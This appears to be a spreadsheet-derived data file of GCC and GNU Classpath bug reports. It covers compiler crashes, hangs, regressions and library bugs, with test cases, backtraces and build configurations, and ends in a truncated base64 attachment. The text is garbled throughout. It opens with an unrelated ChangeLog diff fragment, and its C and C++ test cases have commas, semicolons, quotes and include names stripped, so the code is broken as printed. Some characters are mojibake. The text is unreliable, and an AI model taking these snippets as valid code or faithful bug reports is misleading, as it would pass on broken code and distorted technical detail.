    git-svn-id: svn+ssh://gcc.gnu.org/svn/gcc/trunk@151696 138bc75d-0d04-0410-961f-82ee72b054a4
diff --git a/gcc/ChangeLog b/gcc/ChangeLog
index 75333c1..cc04831 100644
--- a/gcc/ChangeLog
+++ b/gcc/ChangeLog
@@ -13 +1343 @@
+2009-09-14  Richard Henderson  
+
+       * except.h: Update declarations.
+       (struct pointer_map_t): Forward declare.
+       (ERT_UNKNOWN ERT_THROW ERT_CATCH): Remove.</t>
  </si>
  <si>
    <t>GCC-261</t>
  </si>
  <si>
    <t>gcc with gas compilation bug on Solaris 8/Intel</t>
  </si>
  <si>
    <t>When building gcc with gas support on Solaris 8/Intel
(and probably earlier versions as well) gcc provides the
unsupported -s option to gas which is only valid for the
Solaris native /usr/ccs/bin/as.
The build procedure stops halfway during stage 2 as gas
refuses to assemble with the -s option.
Release:
2.95.2
Environment:
Solaris 8/Intel gcc 2.95.2 gas from binutils 2.9.1</t>
  </si>
  <si>
    <t>fmajid</t>
  </si>
  <si>
    <t>CLASSPATH-22863</t>
  </si>
  <si>
    <t>[Swing] JTabbedPane.setMnemonicAt should allow 0 chars</t>
  </si>
  <si>
    <t>The above method should allow 'empty' chars (which are equal to int 0) to be set as a way to unset any previously set mnemonics.
See the just added test in mauve:
gnu.testlet.javax.swing.JTabbedPane.Mnemonic</t>
  </si>
  <si>
    <t>GCC-56979</t>
  </si>
  <si>
    <t>ICE in output_operand: invalid operand for code 'P'</t>
  </si>
  <si>
    <t>Created attachment 29882
Reduced testcase
The attached testcase causes the following ICE when compiled as shown:
$ arm-none-linux-gnueabi-g++ -fsigned-char -march=armv7-a -mfloat-abi=hard -mfpu=neon -ftree-vectorize -fPIC besttry.c
besttry.c: In function â€˜float2 operator-(float float2)â€™:
besttry.c:7:1: internal compiler error: output_operand: invalid operand for code 'P'
 }
 ^
0x86acde output_operand_lossage(char const* ...)
        /work/sources/gcc-fsf/master/gcc/final.c:3303
0xcdf7ba arm_print_operand
        /work/sources/gcc-fsf/master/gcc/config/arm/arm.c:18336
0x86ad2e output_operand(rtx_def* int)
        /work/sources/gcc-fsf/master/gcc/final.c:3725
0x86b70b output_asm_insn
        /work/sources/gcc-fsf/master/gcc/final.c:3604
0x86b70b output_asm_insn(char const* rtx_def**)
        /work/sources/gcc-fsf/master/gcc/final.c:3493
0xcd6864 output_move_vfp(rtx_def**)
        /work/sources/gcc-fsf/master/gcc/config/arm/arm.c:15383
0x86c6e8 final_scan_insn(rtx_def* _IO_FILE* int int int*)
        /work/sources/gcc-fsf/master/gcc/final.c:2853
0x86da15 final(rtx_def* _IO_FILE* int)
        /work/sources/gcc-fsf/master/gcc/final.c:1957
0x86de29 rest_of_handle_final
        /work/sources/gcc-fsf/master/gcc/final.c:4332
Issue also seen on 4.7 and 4.8.
arm-none-linux-g++ -v: 
Using built-in specs.
COLLECT_GCC=/work/builds/gcc-fsf-master/tools/bin/arm-none-linux-gnueabi-g++
COLLECT_LTO_WRAPPER=/work/builds/gcc-fsf-master/tools/libexec/gcc/arm-none-linux-gnueabi/4.9.0/lto-wrapper
Target: arm-none-linux-gnueabi
Configured with: /work/sources/gcc-fsf/master/configure --target=arm-none-linux-gnueabi --prefix=/work/builds/gcc-fsf-master/tools --with-sysroot=/work/builds/gcc-fsf-master/sysroot-arm-none-linux-gnueabi --disable-libssp --disable-libgomp --disable-libmudflap --enable-languages=cc++ --with-arch=armv7-a --with-fpu=vfpv3-d16 --with-float=softfp --with-thumb : (reconfigured) /work/sources/gcc-fsf/master/configure --target=arm-none-linux-gnueabi --prefix=/work/builds/gcc-fsf-master/tools --with-sysroot=/work/builds/gcc-fsf-master/sysroot-arm-none-linux-gnueabi --disable-libssp --disable-libgomp --disable-libmudflap --with-arch=armv7-a --with-fpu=vfpv3-d16 --with-float=softfp --with-thumb target_alias=arm-none-linux-gnueabi CC=gcc --enable-languages=cc++lto --no-create --no-recursion
Thread model: posix
gcc version 4.9.0 20130416 (experimental) (GCC)</t>
  </si>
  <si>
    <t>mgretton</t>
  </si>
  <si>
    <t>GCC-64817</t>
  </si>
  <si>
    <t>[5 Regression] compilation hangs at -O3 with -g enabled on x86_64-linux-gnu</t>
  </si>
  <si>
    <t>The following code causes the current gcc trunk to hang at -O3 with -g enabled. 
This is a regression from 4.9.x. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/5.0.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 5.0.0 20150126 (experimental) [trunk revision 220102] (GCC) 
$ 
$ gcc-trunk -O3 -c small.c
$ gcc-trunk -O2 -g -c small.c
$ gcc-4.9 -O3 -g -c small.c
$ 
$ timeout -s 9 30 gcc-trunk -O3 -g -c small.c
Killed
$ 
------------------------------
int a b d
void
fn1 ()
{
  for (b = 0 b &lt; 9 b++)
    {
      int e
      for (d = 0 d &lt; 5 d++)
	{
	  a 
	  a ^= 14
	}
      e = (a ^= 1) &lt; 0
    }
}</t>
  </si>
  <si>
    <t>CLASSPATH-22993</t>
  </si>
  <si>
    <t>Possible NPE in gnu.java.awt.peer.gtk.GdkGraphics2D</t>
  </si>
  <si>
    <t xml:space="preserve">In classpath-0.15:
In class gnu.java.awt.peer.gtk.GdkGraphics2D at line 513
there is an if statement part of which allows for the
possibility of the variable xform being null.  However
inside the body of the if statement xform is dereferenced.
If xform really can't be null the check can be eliminated.
Found by FindBugs http://findbugs.sourceforge.net
</t>
  </si>
  <si>
    <t>GCC-3202</t>
  </si>
  <si>
    <t>incorrect debugging line number and/or file</t>
  </si>
  <si>
    <t>C source code which includes files defining functions
especially functions which refer back to the first file
produce debugging information which refers to the wrong
filename and/or the wrong line number in the file.
This likely affects all dbxout ports not just AIX xcoffout.
Release:
gcc 3.0 20010614 (prerelease)
Environment:
powerpc-ibm-aix4.3.3.0
How-To-Repeat:
Debug an application which throws an exception through
libgcc_s.sh unwind-dw2.c which includes unwind.inc and
step through the functions.  GDB complains about line
numbers greater than the number of lines in the files and
jumps to source code which is not related to the function
being debugged but is a correct line number in another file.</t>
  </si>
  <si>
    <t>GCC-4589</t>
  </si>
  <si>
    <t>inernal error--unrecognizable insn</t>
  </si>
  <si>
    <t>A compiler crash occurs on src.cxx:43 on HP.  The file compiles fine under Linux Solaris and Windows versions of gcc.  It has not been tested on gcc 3.x as neither we are not yet ready to make the major-version upgrade.
Int and Uint are well-tested templates implemented n-bit fixed-point numbers.
Release:
gcc 2.95.3 20010315
Environment:
HP-UX B11.0
How-To-Repeat:
(output from gcc with -v option)
Reading specs from /usr/opt/gcc_2_95_3/lib/gcc-lib/hppa2.0w-hp-hpux11.00/2.95.3/specs
gcc version 2.95.3 20010315 (release)
GNU CPP version 2.95.3 20010315 (release) (hppa)
#include ... search starts here:
#include  search starts here:
 /edc/wa/benedict/f3_id6/csfg/hpu_gnu/Fd_home/include
 .
 /usr/opt/gcc_2_95_3/lib/gcc-lib/hppa2.0w-hp-hpux11.00/2.95.3/../../../../include/g++-3
 /usr/opt/gcc_2_95_3/include
 /usr/opt/gcc_2_95_3/lib/gcc-lib/hppa2.0w-hp-hpux11.00/2.95.3/../../../../hppa2.0w-hp-hpux11.00/include
 /usr/opt/gcc_2_95_3/lib/gcc-lib/hppa2.0w-hp-hpux11.00/2.95.3/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
End of omitted list.
 /usr/opt/gcc_2_95_3/lib/gcc-lib/hppa2.0w-hp-hpux11.00/2.95.3/cc1plus src.ii -quiet -dumpbase src.cc -version -o src.s
GNU C++ version 2.95.3 20010315 (release) (hppa2.0w-hp-hpux11.00) compiled by GNU C version 2.95.3 20010315 (release).
src.cxx: In function `void loop6(Fxp::Int Fxp::Int &amp;)':
src.cxx:43: internal error--unrecognizable insn:
(insn 3272 3270 3915 (set (reg:SI 1044)
        (plus:SI (reg:SI 1041)
            (const_int 8192 [0x2000]))) -1 (nil)
    (nil))</t>
  </si>
  <si>
    <t>benedict.j.brown</t>
  </si>
  <si>
    <t>GCC-79798</t>
  </si>
  <si>
    <t>[7 Regression] std::bind loses cv-qualifiers in result_of type</t>
  </si>
  <si>
    <t>Another case like PR 79486 this fails to compile with trunk:
#include 
struct X { }
const X f(int)
struct Y {
  void operator()(X
  int operator()(const X
}
auto b = std::bind(Y() std::bind(f std::placeholders::_1))
auto i = b(1)
x.cc:12:13: error: no match for call to â€˜(std::_Bind))(int)&gt;)&gt;) (int)â€™
 auto i = b(1)
             ^</t>
  </si>
  <si>
    <t>GCC-78526</t>
  </si>
  <si>
    <t>[7 Regression] ICE: in decompose at rtl.h:2117 with -g -mavx512bw</t>
  </si>
  <si>
    <t>Created attachment 40148
reduced testcase
Compiler output:
$ x86_64-pc-linux-gnu-gcc -O -fno-tree-ccp -fno-tree-sra -g -mavx512bw testcase.c
testcase.c: In function 'foo':
testcase.c:16:1: internal compiler error: in decompose at rtl.h:2117
 }
 ^
0xbbcb00 wi::int_traits &gt;::decompose(long* unsigned int std::pair const&amp;)
        /repo/gcc-trunk/gcc/rtl.h:2117
0xbbcb00 wide_int_ref_storage::wide_int_ref_storage &gt;(std::pair const&amp; unsigned int)
        /repo/gcc-trunk/gcc/wide-int.h:976
0xbbcb00 generic_wide_int &gt;::generic_wide_int &gt;(std::pair const&amp; unsigned int)
        /repo/gcc-trunk/gcc/wide-int.h:753
0xbbcb00 unsigned long wi::extract_uhwi &gt;(std::pair const&amp; unsigned int unsigned int)
        /repo/gcc-trunk/gcc/wide-int.h:3054
0xbbcb00 simplify_immed_subreg
        /repo/gcc-trunk/gcc/simplify-rtx.c:5745
0xbd62e8 simplify_gen_subreg(machine_mode rtx_def* machine_mode unsigned int)
        /repo/gcc-trunk/gcc/simplify-rtx.c:6220
0xbd8666 simplify_replace_fn_rtx(rtx_def* rtx_def const* rtx_def* (*)(rtx_def* rtx_def const* void*) void*)
        /repo/gcc-trunk/gcc/simplify-rtx.c:491
0xec18dc propagate_for_debug(rtx_insn* rtx_insn* rtx_def* rtx_def* basic_block_def*)
        /repo/gcc-trunk/gcc/valtrack.c:201
0x14ac03c try_combine
        /repo/gcc-trunk/gcc/combine.c:4357
0x14b3660 combine_instructions
        /repo/gcc-trunk/gcc/combine.c:1264
0x14b3660 rest_of_handle_combine
        /repo/gcc-trunk/gcc/combine.c:14548
0x14b3660 execute
        /repo/gcc-trunk/gcc/combine.c:14593
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ x86_64-pc-linux-gnu-gcc -v                                                     
Using built-in specs.
COLLECT_GCC=/repo/gcc-trunk/binary-latest-amd64/bin/x86_64-pc-linux-gnu-gcc
COLLECT_LTO_WRAPPER=/repo/gcc-trunk/binary-trunk-242789-checking-yes-rtl-df-extra-nographite-amd64/bin/../libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /repo/gcc-trunk//configure --enable-languages=cc++ --enable-valgrind-annotations --disable-nls --enable-checking=yesrtldfextra --without-cloog --without-ppl --without-isl --build=x86_64-pc-linux-gnu --host=x86_64-pc-linux-gnu --target=x86_64-pc-linux-gnu --with-ld=/usr/bin/x86_64-pc-linux-gnu-ld --with-as=/usr/bin/x86_64-pc-linux-gnu-as --disable-libstdcxx-pch --prefix=/repo/gcc-trunk//binary-trunk-242789-checking-yes-rtl-df-extra-nographite-amd64
Thread model: posix
gcc version 7.0.0 20161123 (experimental) (GCC) 
The reduced testcase has out-of-bounds vector index the original testcase didn't have it though.
Tested revisions:
r242789 - FAIL
r242600 - FAIL
6-branch r242830 - OK</t>
  </si>
  <si>
    <t>GCC-2773</t>
  </si>
  <si>
    <t>allocator not used by stringstream!</t>
  </si>
  <si>
    <t>To my surprice I found that stringstream (etc) calls
directly malloc/free instead of Allocator::allocate()
as it should.
Consider the following test program:
----------------------------------------------------------
#include 
#include 
#define _GLIBCPP_FULLY_COMPLIANT_HEADERS
#include 
#include 
#include      // Needed for 'write'
static bool start = false
#define print(x) if (start) write(1 x sizeof(x))
void* operator new(size_t size)
{
  print(Calling new\n)
  return malloc(size)
}
void* operator new[](size_t size)
{
  print(Calling new[]\n)
  return malloc(size)
}
void operator delete(void* ptr)
{
  print(Calling delete\n)
  free(ptr)
}
void operator delete[](void* ptr)
{
  print(Calling delete[]\n)
  free(ptr)
}
class my_allocator : public std::allocator {
public:
  pointer allocate(size_type size std::allocator::const_pointer hint = 0)
  {
    print(Calling allocate\n)
    return new char [size]
  }
  void deallocate(pointer p size_type)
  {
    print(Calling deallocate\n)
    delete [] p
  }
}
typedef std::basic_stringstream my_allocator&gt; my_stringstream
size_t size
void test(void)
{
  my_stringstream ss
  print(Writing 12 characters to stringstream:\n)
  ss &lt;&lt; Test  &lt;&lt; 123456 &lt;&lt; '\n'
  print(Writing 10000013 characters to stringstream:\n)
  for (int i = 0 i &lt; 100000 ++i)
    ss &lt;&lt; 01234567890123456789012345678901234567890123456789012345678901234567890123456789012  ss &lt;&lt; Test  &lt;&lt; 123.456 &lt;&lt; '\n'
  print(Done writing to stringstream.\n)
  size = ss.rdbuf()-&gt;pubseekoff(0 std::ios_base::cur std::ios_base::out) -
         ss.rdbuf()-&gt;pubseekoff(0 std::ios_base::cur std::ios_base::in)
  print(Destructing stringstream object\n)
}
int main(void)
{
  start = true
  print(Start test\n)
  new char [10]
  test()
  print(End test\n)
  start = false
  std::cout &lt;&lt; Size of stringstream buffer was:  &lt;&lt; size &lt;&lt; '\n'
  return 0
}
-------------------------------------------------------
The output of this program is:
Start test
Calling new[]
Calling new
Writing 12 characters to stringstream:
Calling new
Calling new
Writing 10000013 characters to stringstream:
Done writing to stringstream.
Destructing stringstream object
Calling delete
Calling delete
Calling delete
End test
Size of stringstream buffer was: 10000025
Prove that the buffer of over 10 Mb was allocated with
malloc was found by linking with a malloc library that
prints every call to malloc/free then the output is:
Calling new[]
[Calling malloc(10) = 0x805b1b8]Calling new
[Calling malloc(84) = 0x805b1ca]Writing 12 characters to stringstream:
[Calling malloc(1037) = 0x805b224]Calling new
[Calling malloc(20) = 0x805b636][Calling malloc(17) = 0x805b650][Calling malloc(18) = 0x805b666]Calling new
[Calling malloc(16) = 0x805b67e]Writing 10000013 characters to stringstream:
Destructing stringstream object
[Calling free(0x945b6ca)]Calling delete
[Calling free(0x805b1ca)][Calling free(0x805b666)][Calling free(0x805b650)]Calling delete
[Calling free(0x805b636)]Calling delete
[Calling free(0x805b67e)]End test
[Calling malloc(20)[Calling free(0x805b1e4)] = 0x805b1ca][Calling malloc(17)[Calling free(0x805b1fa)] = 0x805b1e4][Calling malloc(18)[Calling free(0x805b212)] = 0x805b1fa][Calling malloc(16)[Calling free(0x805b228)] = 0x805b212]Size of stringstream buffer was: 10000025
[Calling free(0x8054d8e)][Calling free(0x8054a04)][Calling free(0x8054c1c)][Calling free(0x80549f2)][Calling free(0x805491a)][Calling free(0x8056f8e)][Calling free(0x8058f94)][Calling free(0x8056e1c)][Calling free(0x8056e0a)][Calling free(0x8056d94)][Calling free(0x80591a0)][Calling free(0x805b1a6)][Calling free(0x805902e)][Calling free(0x805901c)][Calling free(0x8058fa6)]
Is there any reason for not supporting an allocator?
Or is this really an (unintentional) bug?
Release:
gcc version 3.0 20010423 (prerelease)
Environment:
i686-pc-linux-gnu</t>
  </si>
  <si>
    <t>GCC-82664</t>
  </si>
  <si>
    <t>[7/8 Regression ] ICE when using Match7 library</t>
  </si>
  <si>
    <t>Hi I was testing Match7 library and got internal compiler error in one of the tests. I am not sure what is the exact reason that is why title is a bit vague. I can provide more information if necessary.
Link for the library: https://github.com/solodon4/Mach7
It happens at tests/unit/example03.cpp
I am using gcc 7.2.1 on Fedora 26 I've passed only -I flag to the compiler. 
I was planning to attach a reduced test case but submission guideline suggests me to avoid submitting zip files and just send .ii file. If it is necessary I can attach the test case as well.</t>
  </si>
  <si>
    <t>furkanusta17</t>
  </si>
  <si>
    <t>GCC-81086</t>
  </si>
  <si>
    <t>[8 Regression] ICE with structured binding of initializer_list</t>
  </si>
  <si>
    <t>The following code make the compiler emit an ICE with the latest snapshot
:3:13: internal compiler error: in write_unqualified_name at cp/mangle.c:1318
------------
#include 
auto [a] = {0}
-------------
g++ 7.1 does not ICE</t>
  </si>
  <si>
    <t>denis.campredon</t>
  </si>
  <si>
    <t>GCC-20415</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] Vector init builtin produces invalid instruction pshufw</t>
  </si>
  <si>
    <t xml:space="preserve">
__builtin_ia32_vec_init_v4hi and __builtin_ia32_vec_init_v8qi
produce the pshufw instruction when compiled with -O2 and any of the
switches -mmmx -m3dnow -march=pentium-mmx -march=pentium2
-march=k6 -march=k6-2 i.e. targeting CPUs which do not support SSE.
Environment:
System: Linux localhost 2.4.20 #2 Tue Mar 8 16:32:57 CET 2005 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../../cvs/gcc/configure --prefix=/opt/gcc-4.1 --enable-languages=cc++
How-To-Repeat:
typedef short __v4hi __attribute__ ((__vector_size__ (8)))
extern int i
extern __v4hi v1
extern __v4hi v2
void foo (void)
{
  v1 = __builtin_ia32_vec_init_v4hi (iiii)
  v2 = __builtin_ia32_vec_init_v8qi (iiiiiiii)
}
gcc -O2 -mmmx -S example.c 
          .file   example.c
        .text
        .p2align 415
.globl foo
        .type   foo @function
foo:
        pushl   %ebp
        movl    %esp %ebp
        pushl   %eax
        movl    i %edx
        movl    %edx -4(%ebp)
        andl    $255 %edx
        movl    %edx %eax
        movd    -4(%ebp) %mm1
        sall    $8 %eax
        orl     %edx %eax
        pshufw  $0 %mm1 %mm1
        movl    %eax -4(%ebp)
        movq    %mm1 v1
        movd    -4(%ebp) %mm1
        pshufw  $0 %mm1 %mm1
        movq    %mm1 v2       
        leave
        ret
        .size   foo .-foo
        .ident  GCC: (GNU) 4.1.0 20050307 (experimental)
        .section        .note.GNU-stack@progbits</t>
  </si>
  <si>
    <t>mschimek</t>
  </si>
  <si>
    <t>GCC-6063</t>
  </si>
  <si>
    <t xml:space="preserve"> --AqsLC8rIMeq19msA
 Content-Type: text/plain charset=iso-8859-1
 Content-Disposition: inline
 On Tue 26 Mar 2002 Diego Novillo wrote:
 &gt;   Not surprisingly we spend no more than a couple of minutes
 &gt;   generating the initial RTL and 7 hours trying to optimize it.
 &gt;   We seem to be generating mostly fluff because the final .s file
 &gt;   doesn't look overly large (a couple of Mb IIRC).
 &gt; 
 Actually it's smaller than that it's about 300kb (attached).
 Diego.
 --AqsLC8rIMeq19msA
 Content-Type: application/x-gunzip
 Content-Disposition: attachment filename=wei-ku-1-3.1.s.gz
 Content-Transfer-Encoding: base64
 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
